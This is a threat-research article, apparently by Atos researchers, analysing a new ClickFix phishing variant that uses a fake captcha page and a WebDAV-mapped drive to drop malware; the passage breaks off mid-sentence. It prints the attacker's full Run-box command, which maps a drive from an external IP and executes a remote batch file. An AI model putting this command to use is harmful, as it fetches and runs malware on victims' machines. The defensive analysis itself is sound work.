Investigating a New Click-Fix Variant
Investigating a New Click-Fix Variant
https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html
Publish Date: 2026-03-13 09:28:00
Source Domain: thehackernews.com
Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.
Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield
Summary
Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a “net use” command is used to map a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed. Script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside “.asar” archive. This acts as a C2 beacon and a dropper for the final malware payload.
 |
| Figure 1: High-level overview of attack flow. |
Attack overview
In this version, the initial vector of attack is the same as in all the other ones, a web page posing as a captcha mechanism – “happyglamper[.]ro”. It prompts the user to open the Run application via “Win+R”, followed by “Ctrl+V” and “Enter”
 |
| Figure 2: Phishing website 1 |
 |
| Figure 3: Phishing website 2 |
This executes the following command:
“cmd.exe” /c net use Z: http://94.156.170[.]255/webdav /persistent:no && “Z:update.cmd” & net use Z: /delete
Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that “net use” is being used to map and connect to a network drive of an external server from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the next uncommon stages of…
